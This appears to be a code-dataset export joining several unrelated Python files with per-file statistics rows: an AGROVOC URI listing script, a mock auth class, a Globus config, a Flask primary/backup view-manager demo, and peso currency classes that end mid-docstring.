# "land access" : "http://aims.fao.org/aos/agrovoc/c_9000090",
# "land acquisitions" : "http://aims.fao.org/aos/agrovoc/c_89d3dcbb",
# "land administration" : "http://aims.fao.org/aos/agrovoc/c_9000091",
# "land area" : "http://aims.fao.org/aos/agrovoc/c_330588",
# "assignment (land)" : "http://aims.fao.org/aos/agrovoc/c_8c6882ab",
# "collateral (land)" : "http://aims.fao.org/aos/agrovoc/c_931da360",
# "land clearing" : "http://aims.fao.org/aos/agrovoc/c_1662",
# "land concentration" : "http://aims.fao.org/aos/agrovoc/c_8654e90e",
# "concession (land)" : "http://aims.fao.org/aos/agrovoc/c_357653f9",
# "land conflicts" : "http://aims.fao.org/aos/agrovoc/c_e236b2b1",
# "land consolidation" : "http://aims.fao.org/aos/agrovoc/c_4173",
# "land cover" : "http://aims.fao.org/aos/agrovoc/c_37897",
# "land cover mapping" : "http://aims.fao.org/aos/agrovoc/c_9000094",
# "land degradation" : "http://aims.fao.org/aos/agrovoc/c_34823",
# "land development (urbanization)" : "http://aims.fao.org/aos/agrovoc/c_4174",
# "Land dispute" : "http://aims.fao.org/aos/agrovoc/c_1ada969a",
# "land distribution" : "http://aims.fao.org/aos/agrovoc/c_37734",
# "land diversion" : "http://aims.fao.org/aos/agrovoc/c_28716",
# "dowry (land)" : "http://aims.fao.org/aos/agrovoc/c_f7cf8606",
# "land economics" : "http://aims.fao.org/aos/agrovoc/c_25195",
# "encroachment" : "http://aims.fao.org/aos/agrovoc/c_a245096c",
# "land environment" : "http://aims.fao.org/aos/agrovoc/c_7ffc9d69",
# "eviction" : "http://aims.fao.org/aos/agrovoc/c_0b88a82c",
# "expropriation" : "http://aims.fao.org/aos/agrovoc/c_1798",
# "land grabs" : "http://aims.fao.org/aos/agrovoc/c_45ce1b52",
# "land grabbing" : "http://aims.fao.org/aos/agrovoc/c_cc39a497",
# "land improvement" : "http://aims.fao.org/aos/agrovoc/c_28717",
# "land information systems" : "http://aims.fao.org/aos/agrovoc/c_9000096",
# "land inheritance rights" : "http://aims.fao.org/aos/agrovoc/c_70a14ab3",
# "land investments" : "http://aims.fao.org/aos/agrovoc/c_9a4f48b4",
# "land law" : "http://aims.fao.org/aos/agrovoc/c_573abb9f",
# "land loans" : "http://aims.fao.org/aos/agrovoc/c_8b6d895f",
# "land management" : "http://aims.fao.org/aos/agrovoc/c_24866",
# "land markets" : "http://aims.fao.org/aos/agrovoc/c_4175",
# "open access (land)" : "http://aims.fao.org/aos/agrovoc/c_51a39a94",
# "land policies" : "http://aims.fao.org/aos/agrovoc/c_195",
# "property rights" : "http://aims.fao.org/aos/agrovoc/c_37942",
# "land reform" : "http://aims.fao.org/aos/agrovoc/c_4178",
# "land registration" : "http://aims.fao.org/aos/agrovoc/c_9000098",
# "land rent" : "http://aims.fao.org/aos/agrovoc/c_7bea427c",
# "land speculation" : "http://aims.fao.org/aos/agrovoc/c_15d85712",
# "land suitability" : "http://aims.fao.org/aos/agrovoc/c_15992",
# "land tax" : "http://aims.fao.org/aos/agrovoc/c_4180",
# "land tenants" : "http://aims.fao.org/aos/agrovoc/c_330886",
# "land tenure" : "http://aims.fao.org/aos/agrovoc/c_12069",
# "land tenure systems" : "http://aims.fao.org/aos/agrovoc/c_66afb052",
# "land transfers" : "http://aims.fao.org/aos/agrovoc/c_4181",
# "land use mapping" : "http://aims.fao.org/aos/agrovoc/c_9000100",
# "land use planning" : "http://aims.fao.org/aos/agrovoc/c_37899",
# "landlessness" : "http://aims.fao.org/aos/agrovoc/c_24403",
# "land ownership" : "http://aims.fao.org/aos/agrovoc/c_4184",
# "negotiated land reform" : "http://aims.fao.org/aos/agrovoc/c_f84a48c4",
# "pastoral land rights" : "http://aims.fao.org/aos/agrovoc/c_4d6b6100",
# "pastoral lands" : "http://aims.fao.org/aos/agrovoc/c_8e487587",
# "priest of the land" : "http://aims.fao.org/aos/agrovoc/c_28f78be5",
# "marital property rights" : "http://aims.fao.org/aos/agrovoc/c_64d8574a",
# "rangelands" : "http://aims.fao.org/aos/agrovoc/c_6448",
# "regularization of illegal occupation" : "http://aims.fao.org/aos/agrovoc/c_3b50d6b6",
# "right of first occupancy" : "http://aims.fao.org/aos/agrovoc/c_9904d265",
# "scrublands" : "http://aims.fao.org/aos/agrovoc/c_6887",
# "security of tenure (land)" : "http://aims.fao.org/aos/agrovoc/c_7fc44e33",
# "sustainable land management" : "http://aims.fao.org/aos/agrovoc/c_36580",
# "tenant farmers" : "http://aims.fao.org/aos/agrovoc/c_f73955fb",
# "title deed" : "http://aims.fao.org/aos/agrovoc/c_b769471e",
# "Torrens system" : "http://aims.fao.org/aos/agrovoc/c_7017dc39",
# "unclaimed lands" : "http://aims.fao.org/aos/agrovoc/c_0e0e555b",
# "water rights" : "http://aims.fao.org/aos/agrovoc/c_16062",
# "land governance" : "http://aims.fao.org/aos/agrovoc/c_aca7ac6d",
# "land rights" : "http://aims.fao.org/aos/agrovoc/c_37898",
# "urbanization" : "http://aims.fao.org/aos/agrovoc/c_8088",
# }
#retrieve()
#retrieve_stats()
def filenames():
retrieve_list = {
"common lands" : "http://aims.fao.org/aos/agrovoc/c_1782",
"deforestation" : "http://aims.fao.org/aos/agrovoc/c_15590",
"desertification" : "http://aims.fao.org/aos/agrovoc/c_2204",
"dryland management" : "http://aims.fao.org/aos/agrovoc/c_9000036",
"farmland" : "http://aims.fao.org/aos/agrovoc/c_2808",
"forest conservation" : "http://aims.fao.org/aos/agrovoc/c_1374158672853",
"forest degradation" : "http://aims.fao.org/aos/agrovoc/c_331593",
"forest grazing" : "http://aims.fao.org/aos/agrovoc/c_3046",
"forest land" : "http://aims.fao.org/aos/agrovoc/c_24843",
"forest land use" : "http://aims.fao.org/aos/agrovoc/c_1374157828575",
"forest resources" : "http://aims.fao.org/aos/agrovoc/c_3050",
"geographical information systems" : "http://aims.fao.org/aos/agrovoc/c_35131",
"grassland management" : "http://aims.fao.org/aos/agrovoc/c_3364",
"housing" : "http://aims.fao.org/aos/agrovoc/c_3678",
"indigenous tenure systems" : "http://aims.fao.org/aos/agrovoc/c_9000081",
"individual land property" : "http://aims.fao.org/aos/agrovoc/c_9000082",
"land" : "http://aims.fao.org/aos/agrovoc/c_4172",
"land access" : "http://aims.fao.org/aos/agrovoc/c_9000090",
"land administration" : "http://aims.fao.org/aos/agrovoc/c_9000091",
"land classification" : "http://aims.fao.org/aos/agrovoc/c_15991",
"land cover" : "http://aims.fao.org/aos/agrovoc/c_37897",
"land cover mapping" : "http://aims.fao.org/aos/agrovoc/c_9000094",
"land degradation" : "http://aims.fao.org/aos/agrovoc/c_34823",
"land improvement" : "http://aims.fao.org/aos/agrovoc/c_28717",
"land management" : "http://aims.fao.org/aos/agrovoc/c_24866",
"land markets" : "http://aims.fao.org/aos/agrovoc/c_4175",
"land ownership" : "http://aims.fao.org/aos/agrovoc/c_28718",
"land policies" : "http://aims.fao.org/aos/agrovoc/c_195",
"land productivity" : "http://aims.fao.org/aos/agrovoc/c_4176",
"land reform" : "http://aims.fao.org/aos/agrovoc/c_4178",
"land registration" : "http://aims.fao.org/aos/agrovoc/c_9000098",
"land resources" : "http://aims.fao.org/aos/agrovoc/c_4179",
"land rights" : "http://aims.fao.org/aos/agrovoc/c_37898",
"land suitability" : "http://aims.fao.org/aos/agrovoc/c_15992",
"land tax" : "http://aims.fao.org/aos/agrovoc/c_4180",
"land tenure" : "http://aims.fao.org/aos/agrovoc/c_12069",
"land transfers" : "http://aims.fao.org/aos/agrovoc/c_4181",
"land use" : "http://aims.fao.org/aos/agrovoc/c_4182",
"land use mapping" : "http://aims.fao.org/aos/agrovoc/c_9000100",
"land use planning" : "http://aims.fao.org/aos/agrovoc/c_37899",
"landowners" : "http://aims.fao.org/aos/agrovoc/c_4184",
"multiple land use" : "http://aims.fao.org/aos/agrovoc/c_28734",
"natural resources" : "http://aims.fao.org/aos/agrovoc/c_5091",
"natural resources management" : "http://aims.fao.org/aos/agrovoc/c_9000115",
"pastoral society" : "http://aims.fao.org/aos/agrovoc/c_28741",
"pastoralism" : "http://aims.fao.org/aos/agrovoc/c_16144",
"private ownership" : "http://aims.fao.org/aos/agrovoc/c_6192",
"property rights" : "http://aims.fao.org/aos/agrovoc/c_37942",
"public ownership" : "http://aims.fao.org/aos/agrovoc/c_6350",
"rangelands" : "http://aims.fao.org/aos/agrovoc/c_6448",
"reforestation" : "http://aims.fao.org/aos/agrovoc/c_13802",
"resource management" : "http://aims.fao.org/aos/agrovoc/c_6524",
"right of access" : "http://aims.fao.org/aos/agrovoc/c_6604",
"soil degradation" : "http://aims.fao.org/aos/agrovoc/c_7168",
"soil management" : "http://aims.fao.org/aos/agrovoc/c_7176",
"spatial database" : "http://aims.fao.org/aos/agrovoc/c_9000154",
"sustainable forest management" : "http://aims.fao.org/aos/agrovoc/c_331342",
"sustainable land management" : "http://aims.fao.org/aos/agrovoc/c_36580",
"tenure" : "http://aims.fao.org/aos/agrovoc/c_7669",
"urban agriculture" : "http://aims.fao.org/aos/agrovoc/c_35707",
"urban areas" : "http://aims.fao.org/aos/agrovoc/c_8085",
"urban planning" : "http://aims.fao.org/aos/agrovoc/c_37948",
"urbanization" : "http://aims.fao.org/aos/agrovoc/c_8088",
"valuation" : "http://aims.fao.org/aos/agrovoc/c_8152",
"water management" : "http://aims.fao.org/aos/agrovoc/c_8320",
"water resources" : "http://aims.fao.org/aos/agrovoc/c_8325",
"water rights" : "http://aims.fao.org/aos/agrovoc/c_16062",
}
for agrovoc_label, agrovoc_uri in retrieve_list.iteritems():
filename="\"results/all-results+"+agrovoc_label+".json\" , "
print filename
filenames()
| 70.431877 | 1,796 | 0.641835 | 3,774 | 27,398 | 4.556439 | 0.119237 | 0.103978 | 0.189346 | 0.240986 | 0.826297 | 0.819958 | 0.819958 | 0.770528 | 0.732729 | 0.701733 | 0 | 0.080287 | 0.166253 | 27,398 | 389 | 1,797 | 70.431877 | 0.672504 | 0.313892 | 0 | 0.876866 | 0 | 0.022388 | 0.665472 | 0.058421 | 0 | 0 | 0 | 0.002571 | 0 | 0 | null | null | 0 | 0.011194 | null | null | 0.026119 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12
1ce886065126a5f76f691c7355b2a4be4beb01e5 | 193 | py | Python | overpass/auth/auth_base.py | eyeem/overpass | 40e28dbe7258360e0b04b4e48bd107eca827899d | [
"Apache-2.0"
] | null | null | null | overpass/auth/auth_base.py | eyeem/overpass | 40e28dbe7258360e0b04b4e48bd107eca827899d | [
"Apache-2.0"
] | 1 | 2021-04-30T21:11:32.000Z | 2021-04-30T21:11:32.000Z | overpass/auth/auth_base.py | eyeem/overpass | 40e28dbe7258360e0b04b4e48bd107eca827899d | [
"Apache-2.0"
] | null | null | null | from abc import ABC, abstractmethod
class AuthBase(ABC):
@abstractmethod
def get_token(self):
pass
class MockAuth(AuthBase):
def get_token(self):
return "TOKEN"
| 14.846154 | 35 | 0.663212 | 23 | 193 | 5.478261 | 0.565217 | 0.269841 | 0.174603 | 0.238095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.253886 | 193 | 12 | 36 | 16.083333 | 0.875 | 0 | 0 | 0.25 | 0 | 0 | 0.025907 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.125 | 0.125 | 0.125 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 7 |
1cf2bc6146bc954e977e4cd642c9951bc9f1a76a | 203 | py | Python | examples/whattimeisitrightnow/app/config.py | globus/action-provider-tools | 9c84513bb0c6129ec97f7f03bd4052e6c021f14c | [
"Apache-2.0"
] | 3 | 2020-08-26T19:43:45.000Z | 2022-02-11T20:35:52.000Z | examples/whattimeisitrightnow/app/config.py | globus/action-provider-tools | 9c84513bb0c6129ec97f7f03bd4052e6c021f14c | [
"Apache-2.0"
] | 20 | 2020-06-11T21:19:54.000Z | 2022-02-03T19:11:20.000Z | examples/whattimeisitrightnow/app/config.py | globus/action-provider-tools | 9c84513bb0c6129ec97f7f03bd4052e6c021f14c | [
"Apache-2.0"
] | null | null | null | client_id = "16e16447-209a-4825-ae19-25e279d91642"
client_secret = "SECRET"
our_scope = "https://auth.globus.org/scopes/16e16447-209a-4825-ae19-25e279d91642/action_all_with_groups"
token_audience = None
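# Descriptive comments (added, hedged): ``client_id`` and ``client_secret``
# are this Action Provider's confidential Globus Auth client credentials
# ("SECRET" is clearly a placeholder); ``our_scope`` is the scope callers
# must hold to invoke the provider; leaving ``token_audience`` as None is
# read here as "use the default audience check".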
| 40.6 | 104 | 0.812808 | 29 | 203 | 5.448276 | 0.758621 | 0.151899 | 0.202532 | 0.253165 | 0.405063 | 0 | 0 | 0 | 0 | 0 | 0 | 0.272251 | 0.059113 | 203 | 4 | 105 | 50.75 | 0.554974 | 0 | 0 | 0 | 0 | 0.25 | 0.650246 | 0.17734 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1cf8f87700cfde067200d4a069549ab0416c3db6 | 8,161 | py | Python | demo/master/master_app/view_manager/routes.py | darksigma/traceless | eed3a35e90b8bbbf272e1f324e1c28de7afe08da | [
"MIT"
] | 1 | 2015-06-19T14:27:52.000Z | 2015-06-19T14:27:52.000Z | master/master_app/view_manager/routes.py | pratheeknagaraj/securechat | eed3a35e90b8bbbf272e1f324e1c28de7afe08da | [
"MIT"
] | null | null | null | master/master_app/view_manager/routes.py | pratheeknagaraj/securechat | eed3a35e90b8bbbf272e1f324e1c28de7afe08da | [
"MIT"
] | 1 | 2018-09-22T03:36:09.000Z | 2018-09-22T03:36:09.000Z | from . import view_manager
from flask import jsonify, request, abort
from flask import current_app as app
import os
from .. import traceless_crypto
import requests
import json
@view_manager.route('/', methods = ['POST'])
def hello_world():
print "hello world"
return "hello world"
@view_manager.route('/tick', methods=['POST'])
def tick():
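    # Dead-man's-switch bookkeeping (descriptive comment added for clarity):
    # every call advances a global clock. A primary that has not pinged for 5
    # ticks is replaced by the backup -- but only once it has acknowledged the
    # current view number -- and a backup that has gone silent for 5 ticks is
    # dropped; either change bumps the shard's view number 'N'.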
with app.jinja_env.globals['server_view_manager_lock']:
app.jinja_env.globals['current_tick'] += 1
for shard in app.jinja_env.globals['server_views']:
if app.jinja_env.globals['current_tick'] - app.jinja_env.globals['primary_ticks'][shard] >= 5 \
and app.jinja_env.globals['server_views'][shard]['N'] == app.jinja_env.globals['primary_acks'][shard] \
and app.jinja_env.globals['server_views'][shard]['B'] != '':
app.jinja_env.globals['server_views'][shard]['P'] = app.jinja_env.globals['server_views'][shard]['B']
app.jinja_env.globals['server_views'][shard]['B'] = ''
app.jinja_env.globals['server_views'][shard]['N'] += 1
app.jinja_env.globals['primary_acks'][shard] = app.jinja_env.globals['backup_acks'][shard]
app.jinja_env.globals['primary_ticks'][shard] = app.jinja_env.globals['backup_ticks'][shard]
if app.jinja_env.globals['server_views'][shard]['B'] != '' \
and app.jinja_env.globals['current_tick'] - app.jinja_env.globals['backup_ticks'][shard] >= 5 \
and app.jinja_env.globals['server_views'][shard]['N'] == app.jinja_env.globals['primary_acks'][shard]:
app.jinja_env.globals['server_views'][shard]['B'] = ''
app.jinja_env.globals['server_views'][shard]['N'] += 1
return jsonify({'views' : app.jinja_env.globals['server_views']}), 200
@view_manager.route('/process_ping', methods=['POST'])
def process_ping():
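    # Descriptive comment (added): slaves ping with their URL, RSA key
    # material, and the view number they last saw. A brand-new slave becomes
    # primary of a shard that has never had one (view number still 0), or
    # failing that backup of a shard whose primary has acked the current
    # view. Known slaves refresh their liveness tick, and a primary that
    # reports view_num == 0 (i.e. it restarted) is failed over to the backup
    # when one exists.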
with app.jinja_env.globals['server_view_manager_lock']:
app.jinja_env.globals['slave_keys'][request.json['slave_url']] = {'n' : request.json['rsa_n'], 'd' : request.json['rsa_d'], 'e' : request.json['rsa_e']}
if is_registered(request.json['slave_url']) is None:
no_primary = shards_without_primary()
no_backup = shards_without_backup()
if len(no_primary) != 0:
for shard in no_primary:
if app.jinja_env.globals['server_views'][shard]['N'] == 0:
app.jinja_env.globals['server_views'][shard]['N'] = request.json['view_num'] + 1
app.jinja_env.globals['server_views'][shard]['P'] = request.json['slave_url']
app.jinja_env.globals['primary_ticks'][shard] = app.jinja_env.globals['current_tick']
break
elif len(no_backup) != 0:
for shard in no_backup:
if app.jinja_env.globals['server_views'][shard]['N'] == app.jinja_env.globals['primary_acks'][shard]:
app.jinja_env.globals['server_views'][shard]['N'] += 1
app.jinja_env.globals['server_views'][shard]['B'] = request.json['slave_url']
app.jinja_env.globals['backup_ticks'][shard] = app.jinja_env.globals['current_tick']
break
else:
shard, view = is_registered(request.json['slave_url'])
if view['P'] == request.json['slave_url']:
if request.json['view_num'] == 0 and view['B'] != '':
app.jinja_env.globals['server_views'][shard]['P'] = app.jinja_env.globals['server_views'][shard]['B']
app.jinja_env.globals['server_views'][shard]['B'] = ''
app.jinja_env.globals['server_views'][shard]['N'] += 1
app.jinja_env.globals['primary_acks'][shard] = app.jinja_env.globals['backup_acks'][shard]
app.jinja_env.globals['primary_ticks'][shard] = app.jinja_env.globals['backup_ticks'][shard]
else:
app.jinja_env.globals['primary_acks'][shard] = request.json['view_num']
app.jinja_env.globals['primary_ticks'][shard] = app.jinja_env.globals['current_tick']
elif view['B'] == request.json['slave_url']:
if request.json['view_num'] == 0 and app.jinja_env.globals['server_views'][shard]['N'] == app.jinja_env.globals['primary_acks'][shard]:
app.jinja_env.globals['server_views'][shard]['N'] += 1
app.jinja_env.globals['backup_ticks'][shard] = app.jinja_env.globals['current_tick']
elif request.json['view_num'] != 0:
app.jinja_env.globals['backup_ticks'][shard] = app.jinja_env.globals['current_tick']
return jsonify({'views' : app.jinja_env.globals['server_views']}), 200
@view_manager.route('/update_server_view', methods=['POST'])
def update_server_view():
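    # Descriptive comment (added): clients must present a nonce signed by the
    # master's signing scheme; each nonce is answered at most once (replies
    # are cached in server_seen_nonces, making the call idempotent and
    # replay-safe). The response lists the current primary and public key for
    # every shard, plus a blind signature over the client's next nonce.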
server_seen_nonces = app.jinja_env.globals['server_seen_nonces']
server_seen_nonces_lock = app.jinja_env.globals['server_seen_nonces_lock']
with server_seen_nonces_lock:
if not request.json or not traceless_crypto.verify(request.json['nonce'], request.json['signature']):
abort(400)
if request.json['nonce'] in server_seen_nonces:
return server_seen_nonces[request.json['nonce']]
shards = {}
with app.jinja_env.globals['server_view_manager_lock']:
for shard in app.jinja_env.globals['server_views']:
if app.jinja_env.globals['server_views'][shard]['P'] == '':
                shards[shard] = None
else:
shards[shard] = {
'url' : app.jinja_env.globals['server_views'][shard]['P'],
'server_pk_n' : app.jinja_env.globals['slave_keys'][app.jinja_env.globals['server_views'][shard]['P']]['n'],
'server_pk_e' : app.jinja_env.globals['slave_keys'][app.jinja_env.globals['server_views'][shard]['P']]['e']
}
server_seen_nonces[request.json['nonce']] = jsonify({'shards' : shards,
'blinded_sign' : traceless_crypto.ust_sign(request.json['blinded_nonce'])}), 200
return server_seen_nonces[request.json['nonce']]
@view_manager.route('/connect_to_slave', methods=['POST'])
def connect_to_slave():
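    # Descriptive comment (added, hedged): same nonce/replay scheme as above,
    # but the master also blind-signs a nonce under the slave's RSA key
    # (registered via process_ping), presumably so the client can present an
    # untraceable token directly to that slave afterwards.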
server_seen_nonces = app.jinja_env.globals['server_seen_nonces']
server_seen_nonces_lock = app.jinja_env.globals['server_seen_nonces_lock']
with server_seen_nonces_lock:
if not request.json or not traceless_crypto.verify(request.json['nonce'], request.json['signature']):
abort(400)
with app.jinja_env.globals['server_view_manager_lock']:
if request.json['nonce'] in server_seen_nonces:
return server_seen_nonces[request.json['nonce']]
slave_n = app.jinja_env.globals['slave_keys'][request.json['slave_url']]['n']
slave_d = app.jinja_env.globals['slave_keys'][request.json['slave_url']]['d']
server_seen_nonces[request.json['nonce']] = jsonify({'blinded_slave_sign' : traceless_crypto.master_ust_sign_for_slave(request.json['blinded_slave_nonce'], slave_n, slave_d),
'blinded_sign' : traceless_crypto.ust_sign(request.json['blinded_nonce'])}), 200
return server_seen_nonces[request.json['nonce']]
def is_registered(slave_url):
views = app.jinja_env.globals['server_views']
shard = [x for x in views if views[x]['P'] == slave_url or views[x]['B'] == slave_url]
if len(shard) == 0:
return None
else:
shard = shard[0]
return shard, views[shard]
def shards_without_primary():
views = app.jinja_env.globals['server_views']
return [x for x in views if views[x]['P'] == '']
def shards_without_backup():
views = app.jinja_env.globals['server_views']
return [x for x in views if views[x]['B'] == '']
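# Hedged client-side sketch (editor's addition): what a slave's ping to
# /process_ping looks like. The URLs, port numbers and key fields below are
# illustrative only; view_num == 0 signals a freshly (re)started slave.
#
#   import requests
#   requests.post("http://master:5000/process_ping", json={
#       "slave_url": "http://slave-1:5001",
#       "view_num": 0,
#       "rsa_n": "...", "rsa_d": "...", "rsa_e": "...",
#   })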
| 57.879433 | 187 | 0.604828 | 1,029 | 8,161 | 4.527697 | 0.081633 | 0.127066 | 0.174716 | 0.285898 | 0.800172 | 0.788152 | 0.772483 | 0.736853 | 0.690062 | 0.654647 | 0 | 0.00566 | 0.24225 | 8,161 | 140 | 188 | 58.292857 | 0.747736 | 0 | 0 | 0.442623 | 0 | 0 | 0.175512 | 0.017404 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.057377 | null | null | 0.008197 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1c0a1063e1839031e99afef98b206f5e41277ed4 | 19,195 | py | Python | multicurrency/peso.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | 2 | 2021-03-26T18:19:57.000Z | 2021-07-27T01:15:50.000Z | multicurrency/peso.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | null | null | null | multicurrency/peso.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
#
# copyright: 2020-2022, Frederico Martins
# author: Frederico Martins <http://github.com/fscm>
# license: SPDX-License-Identifier: MIT
"""Peso currency representation(s)."""
from decimal import Decimal
from typing import Optional, Union
from .currency import Currency
class ArgentinePeso(Currency):
"""Argentine Peso currency representation.
Simple usage example:
>>> from multicurrency import ArgentinePeso
>>> argentine_peso = ArgentinePeso(
... amount=123456.789)
>>> print(argentine_peso)
$ 123.456,79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'ArgentinePeso':
"""Class creator.
Returns:
ArgentinePeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='ARS',
numeric_code='032',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='AR$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class ChileanPeso(Currency):
"""Chilean Peso currency representation.
Simple usage example:
>>> from multicurrency import ChileanPeso
>>> chilean_peso = ChileanPeso(
... amount=123456.789)
>>> print(chilean_peso)
$123.457
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 0,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 0,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'ChileanPeso':
"""Class creator.
Returns:
ChileanPeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='CLP',
numeric_code='152',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='CL$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class ColombianPeso(Currency):
"""Colombian Peso currency representation.
Simple usage example:
>>> from multicurrency import ColombianPeso
>>> colombian_peso = ColombianPeso(
... amount=123456.789)
>>> print(colombian_peso)
$ 123.456,79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'ColombianPeso':
"""Class creator.
Returns:
ColombianPeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='COP',
numeric_code='170',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='CO$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class CubanPeso(Currency):
"""Cuban Peso currency representation.
Simple usage example:
>>> from multicurrency import CubanPeso
>>> cuban_peso = CubanPeso(
... amount=123456.789)
>>> print(cuban_peso)
$123,456.79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'CubanPeso':
"""Class creator.
Returns:
CubanPeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='CUP',
numeric_code='192',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='CU$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class DominicanPeso(Currency):
"""Dominican Peso currency representation.
Simple usage example:
>>> from multicurrency import DominicanPeso
>>> dominican_peso = DominicanPeso(
... amount=123456.789)
>>> print(dominican_peso)
